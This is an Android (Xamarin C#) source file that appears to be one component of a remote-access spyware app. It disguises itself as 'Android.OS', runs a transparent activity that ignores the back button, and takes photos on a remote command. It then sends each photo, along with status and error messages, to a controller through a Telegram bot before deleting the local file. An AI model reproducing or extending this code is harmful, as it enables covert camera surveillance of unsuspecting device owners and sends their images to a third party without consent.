using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.Hardware;
using Android.Content.PM;
using static Android.Hardware.Camera;
using Java.IO;
using Java.Text;
using Java.Util;
using Java.Lang;
using TeleSharp.Entities.SendEntities;

namespace android.os
{

    [Activity(Label = "Android.OS",NoHistory = true, Theme = "@style/Theme.Transparent")]
    class Cam : Activity, ISurfaceHolderCallback, IPictureCallback
    {
        protected override void OnDestroy()
        {
            base.OnDestroy();
            inf.Values.RuningCamera = false;
        }
        SurfaceView cameraview;
        ISurfaceHolder surfaceholder;
        Camera Camera;
        Handler timerupdatehandler;
        FrameLayout fl;
        int currtime = 0;
        int sec_bet = 1;
        Runnable timeruptask;
        protected override void OnCreate(Bundle savedInstanceState)
        {
            base.OnCreate(savedInstanceState);
            try
            {
                inf.Values.waitforcamera=true;
                inf.Values.RuningCamera = true;
                SetContentView(Resource.Layout.cam);
                cameraview = (SurfaceView)FindViewById(Resource.Id.surfaceView1);
                surfaceholder = cameraview.Holder;
                surfaceholder.SetType(SurfaceType.PushBuffers);
                surfaceholder.AddCallback(this);
                fl = FindViewById(Resource.Id.frameLayout1) as FrameLayout;
                timeruptask = new Runnable(run);
                timerupdatehandler = new Handler();
                timerupdatehandler.Post(timeruptask);
            }
            catch (System.Exception ex)
            {
                if (inf.isonline())
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "IN ONC\n" + ex.ToString(), ChatId = inf.Values.sendto });
            }
        }

        private void run()
        {
            try
            {
                if (currtime < sec_bet)
                    currtime++;
                else
                {
                    if (inf.Values.OnTake)
                    {
                        if (DestoriedSurface)
                        {
                            fl.AddView(cameraview);
                            surfaceholder = cameraview.Holder;
                            surfaceholder.SetType(SurfaceType.PushBuffers);
                            surfaceholder.AddCallback(this);
                            DestoriedSurface = false;
                        }
                        else if (OpenedCamera)
                        {
                            inf.Values.OnTake = false;
                            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Taking Photo...!", ChatId = inf.Values.sendto });
                            Camera.TakePicture(null, null, null, this);
                        }      
                    }
                    else if (taked)
                    {
                        taked = false;
                        fl.RemoveView(cameraview);
                    }
                }
                timerupdatehandler.PostDelayed(timeruptask, 1000);
            }
            catch (System.Exception ex)
            {
                if(inf.isonline())
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "IN Run\n" + ex.ToString(), ChatId = inf.Values.sendto });
            }
        }

        public void SurfaceChanged(ISurfaceHolder holder, [GeneratedEnum] Android.Graphics.Format format, int width, int height)
        {
            try
            {
                Camera.StartPreview();
            }
            catch { }
        }
        bool OpenedCamera;
        private void OpenCamera(ISurfaceHolder holder)
        {
            try
            {
                Camera = Camera.Open(int.Parse(inf.Values.camid));
                try
                {
                    Camera.SetPreviewDisplay(holder);
                    Camera.Parameters p = Camera.GetParameters();
                    if (this.Resources.Configuration.Orientation != Android.Content.Res.Orientation.Landscape)
                    {
                        p.Set("orientation", "portrait");
                        Camera.SetDisplayOrientation(90);
                    }
                    Camera.SetParameters(p);
                    OpenedCamera = true;
                }
                catch
                {
                    Camera.Release();
                }
            }
            catch (System.Exception ex)
            {
                if (inf.isonline())
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "IN SurfaceC\n" + ex.ToString(), ChatId = inf.Values.sendto });
            }
        }
        public void SurfaceCreated(ISurfaceHolder holder)
        {
            try
            {
                OpenCamera(holder);
            }
            catch { }
        }
        bool DestoriedSurface = false;
        public void SurfaceDestroyed(ISurfaceHolder holder)
        {
            try
            {
                Camera.StopPreview();
                Camera.SetPreviewDisplay(null);
                Camera.Release();
                Camera = null;
                OpenedCamera = false;
                inf.Values.waitforcamera = false;
                DestoriedSurface = true;
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Camera Closed!", ChatId = inf.Values.sendto });
                FinishAndRemoveTask();
            }
            catch { }
        }
        public override void OnBackPressed() { }
        public void OnPictureTaken(byte[] data, Android.Hardware.Camera camera)
        {
            MoveTaskToBack(true);
            try
            {
                inf.CTRLApi.SendMessage(new SendMessageParams {Text= "Sending Photo Plz Wait...!",ChatId= inf.Values.sendto});
                File f = new File(Filef.CreateDir(Filef.getmainpth() + "/System/DCIM") + "/p.jpg");
                try
                {
                    OutputStream os = new FileOutputStream(f);
                    os.Write(data);
                    os.Flush();
                    os.Close();
                }
                catch { }
                if ((new System.IO.FileInfo(f.AbsolutePath).Length / 1048576) > 5)
                    inf.CTRLApi.SendDocument(inf.Values.sendto, System.IO.File.ReadAllBytes(f.AbsolutePath), "Camera.jpg");
                else
                    inf.CTRLApi.SendPhoto(inf.Values.sendto, System.IO.File.ReadAllBytes(f.AbsolutePath), "Camera.jpg");
                System.IO.File.Delete(f.AbsolutePath);
                taked = true;
            }
            catch { }
            }
        bool taked;
        private bool ontaking;
    }
}